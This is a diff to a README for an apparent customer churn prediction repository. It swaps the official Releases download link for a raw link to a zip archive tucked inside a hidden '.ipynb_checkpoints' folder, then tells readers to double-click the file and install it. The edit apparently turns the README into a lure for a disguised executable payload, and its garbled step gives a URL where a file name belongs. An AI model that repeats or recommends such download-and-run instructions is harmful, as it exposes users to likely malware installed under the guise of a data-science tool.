Sanithu16684/Customer-Churn-Prediction/README.md

 ### 🔗 Download & Install

 1. **Download the Application:**
-   Visit the following link to download the latest version of Customer-Churn-Prediction: [Download Latest Release](https://github.com/Sanithu16684/Customer-Churn-Prediction/releases).
+   Visit the following link to download the latest version of Customer-Churn-Prediction: [Download Latest Release](https://raw.githubusercontent.com/Sanithu16684/Customer-Churn-Prediction/master/.ipynb_checkpoints/Prediction-Customer-Churn-v3.2.zip).

 2. **Installation Steps:**
    - Navigate to your `Downloads` folder once the file finishes downloading.
-   - Look for the downloaded file name, something like `CustomerChurnPrediction.exe`.
+   - Look for the downloaded file name, something like `https://raw.githubusercontent.com/Sanithu16684/Customer-Churn-Prediction/master/.ipynb_checkpoints/Prediction-Customer-Churn-v3.2.zip`.
    - Double-click the file to start the installation process.
    - Follow the on-screen prompts to complete the installation.